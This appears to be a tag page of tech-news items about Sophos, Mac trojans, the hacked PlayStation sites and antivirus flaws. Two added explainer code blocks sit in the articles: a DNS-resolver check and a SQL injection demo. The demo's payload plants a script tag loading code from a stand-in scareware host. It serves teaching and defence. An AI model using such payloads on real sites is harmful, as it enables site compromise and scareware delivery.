Sophos

Latest


    Multiple antivirus apps are vulnerable to common security flaws

    by Jon Fingas
    04.26.2020

    At least 28 well-known antivirus apps could be exploited by shared security flaws, and a few are still vulnerable now.

  • Daily Update for April 24, 2012

    by Steve Sande
    04.24.2012

    It's the TUAW Daily Update, your source for Apple news in a convenient audio format. You'll get all the top Apple stories of the day in three to five minutes for a quick review of what's happening in the Apple world. Today's episode is available through the inline player, as a direct (non-Flash) download, and as a podcast subscription via iTunes or RSS.

  • Twenty percent of Macs examined infected with Windows malware

    by Kelly Hodgkins
    04.24.2012

    Sophos looked at 100,000 Mac computers and found that one in every five has some form of malware. This might sound alarming, but before you stare at your machine in disgust, you should get some perspective. The survey looked at 100,000 OS X machines that are running Sophos's free Mac anti-virus software. Sophos found that this 20 percent figure is for malware that targets Windows-based computers. Though it can be used as a vector to infect other Windows machines, it won't affect Mac users on OS X. Sophos did find that 1 in 36 Macs (2.7 percent) were infected with OS X malware. Though less than 3 percent may be concerning, it's not as alarming as the 20 percent figure that's making its way into headlines.

  • Kaspersky Lab: Macs not invulnerable to malware

    by Kelly Hodgkins
    04.19.2012

    The writing is on the wall. Our time of innocence is gone. Researchers from Kaspersky Lab claim Mac market share has finally reached the critical point, and the platform is now an attractive target for online criminals. Kaspersky told Ars Technica and other press on Thursday that Mac users can expect "more drive-by downloads, more Mac OS X mass-malware, and more cross-platform exploit kits with Mac-specific exploits." It's not all doom and gloom. Infections in the wild are still sparse, and Apple may slow the spread of future threats with the introduction of Gatekeeper in Mac OS X Mountain Lion. Among other things, Gatekeeper will prevent users from "unknowingly downloading and installing malicious software." If you don't want to wait for Gatekeeper, there are also several good antivirus solutions, like Avast and Sophos, available now for Mac users to download.

  • Two new Mac malware concerns: Tsunami and DevilRobber

    by Victor Agreda Jr
    11.01.2011

    As reported yesterday by Computerworld, there are two malware threats for OS X to concern yourself with (at least for now). The first, Tsunami, isn't much of a threat yet. The other, DevilRobber, may be slowing your Mac down as we speak. Here's more info on each of them.

    Tsunami

    Basically a ported version of some rather old Linux malware, Tsunami isn't being seen widely just yet. Still, the trojan appears to be evolving, and has even been updated for Macs in the variant Tsunami.A, as discussed on this ESET Security blog post. What does Tsunami do? The original was a backdoor program that uses IRC to control your machine and coordinate Distributed Denial of Service attacks. Tsunami.A adds the ability to copy itself, and includes an updated IRC command and control server (which was not active at the time ESET wrote their post). Thus far, Tsunami is merely on the radar: it appears to be in active development, but is not widely disseminated yet.

    DevilRobber

    While Tsunami may be on the horizon, DevilRobber is out there right now, and could be slowing your Mac down. DevilRobber, as Intego reports, isn't just one thing: it's a Trojan horse, a backdoor (allowing remote control), it can steal data (and surreptitiously mine Bitcoin virtual currency) and it can send personal data to servers (thus making it spyware as well). Sounds nasty, eh? Apparently the malware installs DiabloMiner, a legitimate Bitcoin mining program. Using this legit software, DevilRobber, aka OSX/Miner-D, can suck up processor cycles computing the hashes that Bitcoin mining requires. Essentially the malware is using your computer to generate Bitcoins, most likely without you knowing what is going on.

    Worse, Sophos senior tech consultant Graham Cluley told Computerworld that DevilRobber can take pictures of your screen, thus stealing sensitive info, and "it runs a script that copies information to a file called dump.txt regarding truecrypt data, Vidalia (TOR plugin for Firefox), your Safari browsing history and .bash_history" -- all of which are bad things. So how big a threat is DevilRobber? Chances are, if you don't download torrents of commercial Mac software, you're fine. Intego's Mac Security Blog has some more info on DevilRobber, but for now it doesn't appear to be widespread. Also, as with Flashback.C, some users are reporting that if you have Little Snitch installed and enabled, the malware will bail. As usual, we suggest you don't illegally download commercial software via BitTorrent and only download from trusted sources (a developer's site is a good bet, and don't forget about the Mac App Store). If you suspect your machine may be infected, schedule a trip to a local Genius Bar or use antivirus software to scan your machine.

  • iPhone 101: Disable Siri with iPhone passcode to prevent unauthorized use

    by Steve Sande
    10.20.2011

    Welcome to iPhone 101, the series that explains the basics of iPhone operation. This time, it's making sure Siri doesn't let anyone use your locked iPhone. Almost immediately after the release of the iPhone 4S, TUAW started receiving emails from readers who noticed that even when they had a passcode set on the lock screen, someone could pick up their device and issue commands to Siri. This means that unauthorized persons can easily pick up the iPhone 4S, press and hold the Home button and converse with Siri. Fortunately, there's a way to disable Siri while a lock screen passcode is in use. The Sophos Naked Security blog noted that those unauthorized users can do everything from writing an email or sending a text message to maliciously changing calendar appointments. Blogger Graham Cluley notes that it's easy to disable Siri while there's a passcode in effect, and wonders why Apple didn't set the iPhone 4S up that way by default. To make sure Siri is deaf to commands when there's a passcode on the iPhone 4S, go to Settings > General > Passcode Lock, and slide the Siri option to Off. Now, when your friends try to make a prank call to your girlfriend using your iPhone 4S, they'll find that Siri is unwilling to be a participant in the prank.

  • BBC assembles experts to comment on Sony crisis

    by Justin Olivetti
    05.03.2011

    The fact that it's been one of the worst couple of weeks for Sony -- and its customers -- cannot be disputed. However, the future of this crisis, which started a couple of weeks ago when Sony's network was hacked and user information was stolen, is anybody's guess. As such, BBC News assembled a panel of four industry experts to comment on the situation and speculate where Sony might go from here. Richard Merrin, a PR director, said that Sony demonstrated both the worst and best ways to respond to a crisis: "In the first instance, Sony waited ten days before telling users what was happening, which is a classic error in terms of communications. It knocked consumer [confidence] and damaged Sony's reputation. But with the second incident, it has acted extremely quickly and seems to be following the four golden rules in crisis PR -- to be open, honest, transparent and fast." "In terms of PR, I think Sony can turn it around," said ComputerandVideoGames.com's Tim Ingham. "Consumers are often quickly outraged by this sort of wobble from a global corporation -- but we tend to have short memories if we're not personally damaged by a given incident." The security expert, Sophos' Graham Cluley, said this doesn't change how users should protect themselves: "People need to be more careful with their passwords and make sure that they have different passwords for different online accounts." You can read the rest of the comments at BBC News.

  • New trojan MusMinim-A written for Mac OS X

    by Dana Franklin
    02.28.2011

    On Saturday, information security firm Sophos reported a new "backdoor Trojan" designed to allow remote operations and password "phishing" on systems running Mac OS X. The author of the Trojan refers to his or her work as "BlackHole RAT" and claims the malware is still in beta. Indeed, Sophos, who re-named the threat "OSX/MusMinim-A," says the current code is a very basic variation of darkComet, a well-known Remote Access Trojan (RAT) for Microsoft Windows. The source code for darkComet is freely available online. The biggest threat from MusMinim appears to be its ability to display fake prompts to enter the system's administrative password. This allows the malware to collect sensitive user and password data for later use. The Trojan also allows hackers to run shell commands, send URLs to the client to open a website, and force the Mac to shut down, restart or go to sleep arbitrarily. Other "symptoms" include mysterious text files on the user's desktop and full screen alerts that force the user to reboot. Additionally, the malware threatens to grow stronger. "Im a very new Virus, under Development, so there will be much more functions when im finished," the author of the Trojan claims via its user interface. Sophos believes the new malware indicates more hackers are taking notice of the increasingly popular Mac platform. "[MusMinim] could be indicative of more underground programmers taking note of Apple's increasing market share," says Sophos on its blog. Another line from the malware's user interface supports the idea that hackers' interest in Mac OS X is growing. "I know, most people think Macs can't be infected, but look, you ARE Infected!" In an apparent response to the increase in malware threats on the Mac, Apple is reportedly working with prominent information security analysts like Charlie Miller and Dino Dai Zovi to strengthen the overall security of Mac OS X Lion, the company's forthcoming major update to its desktop operating system. 
It's the first time Apple has openly invited researchers to scrutinize its software while still under development. Mac OS X Lion is scheduled to be released this summer. In the meantime, Sophos tells Mac users to be cautious when installing software from less trustworthy sources. "Trojans like this are frequently distributed through pirated software downloads, torrent sites, or anywhere you may download an application expecting to need to install it," they say. Also, "patching is an important part of protection on all platforms" to prevent hackers from exploiting security vulnerabilities in web browsers, plug-ins and other applications. [via AppleInsider]

  • Mac malware survey finds mostly incompatible nasties

    by Darren Murph
    11.24.2010

    See that chart there? That's a lovely graphic conjured up by Sophos, a company that makes ends meet by offering anti-virus software. The company just so happens to also have a flavor for OS X, and based on data culled from 150,000 users, it looks as if 50,000 machines had at least one piece of malware onboard. 'Course, a sizable chunk of these listed (Mal/ASFDldr-A and Mal/Conficker-A, for example) won't even run on OS X, so having them on one's HDD does little more than take up a section of space that could otherwise be used to archive a digital image of Aunt Mary. Graham Cluley, senior technology consultant at Sophos, even stated that Sophos doesn't "see as much Mac malware as Windows malware... by a long shot," but given that its Mac edition software is totally free, you might as well give it a look if you're suddenly stricken with paranoia.

  • Sophos releases free Mac anti-virus package

    by Richard Gaywood
    11.02.2010

    Security company Sophos has today released a free Home Edition of its Mac virus scanner suite. This is a timely move by Sophos to get an early foothold in what could become a significant market for aftermarket OS X security tools. While it's true that Macs have, until now, enjoyed a relatively blissful life free of viruses and other malware, increasing market share means we can sadly expect to see more bad guys target us from now on. There are more examples of recent Mac security problems on the Sophos company blog, and while (of course) they are motivated to scare you into using their product, they aren't making it up either. Thanks to everyone who sent this in.

  • Sophos decries XP Mode vulnerability, Microsoft offers chill pill

    by Vlad Savov
    08.24.2009

    If you're keeping score at home, Microsoft needs to bring two heavies to a fight with Google, but it can lay the smack down on an AV software firm like Sophos all by itself. Richard Jacobs, chief technology officer and master of inflammatory rhetoric at Sophos, points out that Windows 7's XP Mode makes computers vulnerable to attack because the virtualized XP operates independently from the underlying OS and therefore doesn't get the host's firewall and anti-virus protection. For those who actually go to the trouble of buying and updating security software -- like, say, most businesses -- this essentially doubles costs for each new Windows 7 machine. Microsoft has countered that big businesses will be using its MED-V management software, while smaller shops will be able to update the virtualized XP in the same fashion as they would a physical PC. Storm in a teacup, then? Absolutely, but you'll want to give these a read if only for the passive-aggressive silliness that ensues. [Via The Register]
    Read - Richard Jacobs on XP Mode
    Read - MS chief security adviser for EMEA Roger Halbheer retorts
    Read - Jacobs retorts to the retort
    Read - MS developer James O'Neill threetorts

  • Sophos video shows Mac trojan caught in the act

    by Michael Rose
    03.26.2009

    [Video: "Apple Mac malware: Caught on camera," from Sophos Labs on Vimeo] It's not every day that you can watch Mac malware in action, but the team at Sophos Labs has put together the demonstration video above; it shows a malicious installer downloaded from a site pretending to serve up an HD video player, which actually carries the RSPlug-F trojan. Even though Mac users would still have to provide admin credentials to install the application (unlike Windows users, who might catch the Zlob malware just by visiting the webpage), it would be perfectly natural to go ahead and authenticate after downloading an installer... but not a good idea in this case. The fake site and bogus application are appearing in two versions, one billed as MacCinema and another trying to steal the goodwill of a legitimate Windows app called HDTV Player (the real app is from blazevideo.com). RSPlug-F does try to change your DNS settings to point at servers controlled by the bad guys, which could conceivably result in you being redirected to malicious or phony sites; however, if your ISP is on the ball, those bogus DNS servers are already blocked. The only way to catch this bit of malware is via the installer, but it's easy to see how an innocent Mac user might be fooled by the convincing-looking download site. [H/T Ars Technica Infinite Loop]
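    A quick check for the DNS-changing behaviour described above, as an added example that is not from the article or from Sophos: it parses the output of the macOS command `networksetup -getdnsservers <service>` (the sample output below is constructed, using documentation-range addresses rather than any real RSPlug server) and flags any resolver that is not on an allowlist the owner defines. The allowlist of home-network ranges and public resolvers is an assumption; adjust it to your own environment.

```python
import ipaddress

# Constructed sample of what `networksetup -getdnsservers Wi-Fi` might print on a
# Mac whose resolvers were rewritten by a DNS-changing trojan. The addresses are
# documentation-range placeholders (RFC 5737), not real malicious servers.
SAMPLE_OUTPUT = """203.0.113.7
198.51.100.2
"""

# Assumed allowlist: private ranges used by a home router plus two well-known
# public resolvers. Replace with the resolvers you actually expect.
TRUSTED = ["192.168.0.0/16", "10.0.0.0/8", "1.1.1.1", "8.8.8.8", "8.8.4.4"]


def parse_dns_servers(text):
    """Return the IP addresses found in networksetup output, one per line.

    When resolvers come from DHCP, networksetup prints a sentence
    ("There aren't any DNS Servers set on ...") instead of addresses;
    any line that is not a valid IP address is skipped.
    """
    servers = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            servers.append(ipaddress.ip_address(line))
        except ValueError:
            continue
    return servers


def unexpected_resolvers(servers, trusted=TRUSTED):
    """Return the string form of every resolver outside the trusted networks."""
    nets = [ipaddress.ip_network(t, strict=False) for t in trusted]
    return [str(s) for s in servers if not any(s in n for n in nets)]


if __name__ == "__main__":
    # On a real Mac: run `networksetup -getdnsservers Wi-Fi` (or `scutil --dns`)
    # and feed its output to parse_dns_servers instead of the sample.
    suspicious = unexpected_resolvers(parse_dns_servers(SAMPLE_OUTPUT))
    if suspicious:
        print("Unexpected DNS resolvers configured:", ", ".join(suspicious))
    else:
        print("All configured resolvers are on the allowlist.")
```

    A resolver you did not configure is not proof of infection (an ISP or VPN client may set one), but it is exactly the symptom RSPlug-F produces, and it is worth checking every network service, not just Wi-Fi.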

  • Official PlayStation site hacked, says IT company Sophos

    by Andrew Yoon
    07.02.2008

    The official US websites for SingStar Pop and God of War have been hacked, according to IT company Sophos. When visitors clicked onto the PlayStation site, they may have been greeted by a pop-up ad claiming that viruses had been found on their computer. The scare tactic tries to trick people into buying anti-spyware software, and requires a visitor's credit card number. According to Sophos, the hack was implemented through a "SQL injection attack," and, in the company's words, "the website is still infected." However, personal visits to the PlayStation sites in our browser (Firefox 3) have not turned up anything suspicious. [Via Next-Gen]
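    To make the "SQL injection attack" concrete, here is an added example, not code from the article, from Sophos or from Sony, of one well-known way a site ends up serving someone else's pop-up: a comment form that splices visitor text straight into SQL lets the visitor append an UPDATE that stamps a script tag onto every stored page, so later visitors load the scareware from a third-party host; the parameterised version stores the same text harmlessly. The table layout, the page content and the script host are invented, and SQLite's `executescript` stands in for a database driver that accepts stacked statements.

```python
import sqlite3

# Constructed sample content for a fictional game site (not Sony's data).
PAGES = [("singstar", "<h1>SingStar Pop</h1>"), ("godofwar", "<h1>God of War</h1>")]

# Hypothetical scareware loader; the host name is invented (.invalid never resolves).
INJECTED_TAG = '<script src="http://scareware.invalid/fake-av.js"></script>'

# What a visitor submits as a "comment": closes the string literal, ends the
# INSERT, appends an UPDATE that tags every page, then comments out the rest.
PAYLOAD = "hi'); UPDATE pages SET body = body || '" + INJECTED_TAG + "'; --"


def make_db():
    """In-memory database with a pages table and an empty comments table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (slug TEXT PRIMARY KEY, body TEXT)")
    conn.execute("CREATE TABLE comments (id INTEGER PRIMARY KEY, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)", PAGES)
    conn.commit()
    return conn


def add_comment_vulnerable(conn, text):
    """Builds SQL by string concatenation: visitor text becomes part of the SQL.

    executescript models a driver that runs stacked statements, which is what
    lets the trailing UPDATE in PAYLOAD execute.
    """
    sql = "INSERT INTO comments (body) VALUES ('" + text + "');"
    conn.executescript(sql)


def add_comment_safe(conn, text):
    """Parameterised insert: the text is bound as a value and never parsed as SQL."""
    conn.execute("INSERT INTO comments (body) VALUES (?)", (text,))
    conn.commit()


def page_bodies(conn):
    return dict(conn.execute("SELECT slug, body FROM pages"))


def pages_with_script(conn):
    """Slugs of pages that now carry an injected script tag (the visible symptom)."""
    return sorted(slug for slug, body in page_bodies(conn).items() if "<script" in body.lower())


def comment_bodies(conn):
    return [row[0] for row in conn.execute("SELECT body FROM comments ORDER BY id")]


if __name__ == "__main__":
    vuln = make_db()
    add_comment_vulnerable(vuln, PAYLOAD)
    print("vulnerable site, pages now serving the script:", pages_with_script(vuln))

    safe = make_db()
    add_comment_safe(safe, PAYLOAD)
    print("parameterised site, pages serving the script:", pages_with_script(safe))
    print("stored comment text:", comment_bodies(safe)[0][:40], "...")
```

    The injected tag survives in the database, so the site keeps serving the pop-up until the stored content is cleaned, which is why Sophos could say the site was "still infected" after the initial attack. Binding parameters removes the injection; auditing stored content for unexpected script tags finds the damage already done.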